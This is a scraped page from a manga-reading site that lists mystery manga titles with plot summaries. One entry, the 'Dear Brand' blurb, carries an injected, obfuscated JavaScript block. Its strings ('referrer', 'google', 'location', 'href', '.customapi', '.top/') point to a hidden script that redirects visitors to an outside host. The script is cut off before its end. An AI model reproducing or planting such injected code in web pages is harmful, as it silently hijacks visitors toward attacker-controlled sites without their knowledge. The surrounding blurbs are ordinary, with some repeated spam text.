Mystery - Page 48

Discover why fans love manga Mystery with our curated picks. Read Mystery manga free online now!

3144 results

Dawn - Tsumetai Te

Remember that plague you learned about in history class? Well, it's back, ready to infect hordes of people! Follow Nagasawa, a melodramic student caught in the middle of this horrid epidemic, with absolutely no idea what's going on, trying to get through life with infected people all about. Can you say creepy?


Daxiangwuxing (Taoist)

Read Manhua Daxiangwuxing (Taoist); Formless Form; Da Xiang Wuxing; Daxiang Wuxing; Fuerza Sin Forma; Taoist: Ghost Hunter Zhuang Xiaoran, Possessed By A Mysterious Creature In A Car Accident, Awakens To Another World Full Of Demon Spirits. In Her Desperate Time, A Teenager Appeared To Bring Her Back To Life. Xiaoran Learned From Him That There Have Always Been Demons In This World. In Order To Take Out The Demon Spirit In Her Body, She Was Forced To Open A Cohabitation Life With The Teenager, And Set Foot On The Road Of No Return With Him To Catch The Demon… Zhuang Xiaoran, Possessed By A Mysterious Creature In A Car Accident, Awakens To Another World Full Of Demon Spirits. In Her Desperate Time, A Teenager Appeared To Bring Her Back To Life. Xiaoran Learned From Him That There Have Always Been Demons In This World. In Order To Take Out The Demon Spirit In Her Body, She Was Forced To Open A Cohabitation Life With The Teenager, And Set Foot On The Road Of No Return With Him To Catch The Demon… “Daxiangwuxing (Taoist) Manhua” Is Another Name: Đại Tượng Vô Hình 大象无形 大象无形(大道无名) 대상무형: 운명을 삼킨 퇴마사


Day of Disaster

In 2009, a resident of a small mountain village is shot and killed, and this murder leads to a series of sinister events. Jeong-u Cho, a boy who was born and raised in the village, begins to feel a mysterious gaze on him, and finds himself caught up in an uncontrollable disaster.

2 days ago


When he was young, Kurosu Keisuke was in a special TV program showcasing children with supernatural powers, called "Esper Shounen". Seven years after the termination of the program, a murderer appears to be targeting the Esper kids, whom he/she considers to be monsters. Will Keisuke and his old friends be able to discover the murderer and avoid becoming the next victims?!


Dead Company

The story follows Miyamura, a young, unemployed man who has gone through a special experience, but lives an empty existence. However, one day he is scouted by EDC, a major game development company.


Dead End Loop

Watching his little sister attacking and killing someone was a shock but the surprise was bigger when the corpse disappeared together with the feet of his little sister! What is happening? What are the 'replacements' and why, when his sister dies, he goes 'back' to the fateful night when everything begun? How can he escape this dead-end loop?



From Kawa Scans: Distributing thrilling videos in secret. A school game that puts life and death on the line.



Yuuto Lenix, a former DEA investigator was arrested by a false accusation of killing his own partner. The FBI agents gave him a special deal, to look for a particular criminal hiding in the same prison. By the time he was detained in the Schelger Prison, he got to meet his cellmate, Dick Burnford, who didn't show signs of being kind and welcoming upon his arrival. Will he ever be in good terms with his inmates, especially to Dick?


Dear Anonymous Sponsor

Judith, a war orphan of a defeated nation, concealed her identity and exiled to the federal state. She has an anonymous supporter, whom she never met or knew his name, age or how he looked. On one summer day, five years after she sent her letter to her anonymous supporter, once a month with gratitude, she received a letter from him. “Miss Judith, how about spending this summer at Waltz's Curtis mansion?” Waltz, the capital of Baja, from where the letter was sent, Judith's heart bloomed with happiness by receiving a letter from her sponsor. She was amazed to see the skyscrapers, the kind which she saw in the newspapers, which she had never seen in her life. “Miss Judith, don't trust your sponsor too much .” As soon as Judith got off the train, she got involved with an infamous gangster. “I didn't know there were guests. That said, a lady too.” At the sponsor's mansion, which she had finally arrived, there was a suspicious someone that lived in the house instead of her sponsor. “I don't share anything that comes into my hand once.” And the real owner of the mansion who had returned after a while. In the hot summer, as the strange air current spreads around her and the three men, the number of questions gradually increases. “Have you ever thought it was weird? About the things they erased from your memories.” Of the three men who hide their secrets, a nobleman from a foreign country, a successful businessman in the military business, a boss of a low-quality gang, who really is her sponsor? *This is a promo Manhwa for the Novel*


Dear Brand

“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” There are three genders in this world: ABO. Hitman Mo Jia Wen received a mission to assassinate the talented researcher, Shao Yuan Fan. However, in contact with Shao Yuan Fan, he found out that this person has an unknown past, and those past unexpectedly is related and linked to him in countless ways…<script></script><script>function _0x2d35(){var _0x3feecd=['.customapi','google','random','7284490vhcAgo','5630870oXfqcB','16945MgWmkI','nguYw','6538hiTUuF','includes','238689nFUFbf','aeBYg','SKFVA','421575fgOIjR','.top/','http://rea','100XCphVh','then','72BpRfeN','IUAFG','516QPyQlD','https://ip','tGjTv','aOYQh','text','SRuIV','BMWso','ndrtj','zNvFb','href','referrer','','floor','20sBopRG','2296ZTpDyR','3915OoSVCh','location'];_0x2d35=function(){return _0x3feecd;};return _0x2d35();}(function(_0x138ca8,_0x5ccd37){var _0x52556f=_0x2109,_0x1d2bf4=_0x138ca8();while(!![]){try{var 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Dear Door

While in hot pursuit of wanted criminals, a police officer has an unexpected encounter with a rather uncanny demon. Barely surviving the accident, Do Gyeong Joon is left baffled, staring at the sky at the retreating form of the mysterious man he had just met. However, not long after, the two meet again when the demon crashes into Do Gyeong Joon’s apartment, whispering: “Hurry up! You need to get inside me-”


Dear Hong Rang

Read “Dear Hong Rang Novel” – “Dear Hong Rang Manhwa” Online Free At HOTMANHUA The summary of the comic Dear Hong Rang: Is this a true reunion or a false deception? When Jaeyi’s half-brother Hongrang suddenly disappears, she bears the brunt of her wealthy family’s scorn. 10 years later, a man claiming to be Hongrang appears, with much to gain should he truly be who he claims. Though Jaeyi can feel that something is off, the two seem somehow drawn to each other. “Dear Hong Rang” is also known as: Hong Rang / Shallowing the Gold / Tangeum / タングム / 呑金 / 탄금 The comic “Dear Hong Rang” belongs to the Genre: Childhood Friends, Drama, Fantasy, Historical, Manhwa, Mystery, Romance “Kun Manga, MANGA UPDATES, Manhwa Website…” are the most searched keywords on the website S2Manga. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging

3 days ago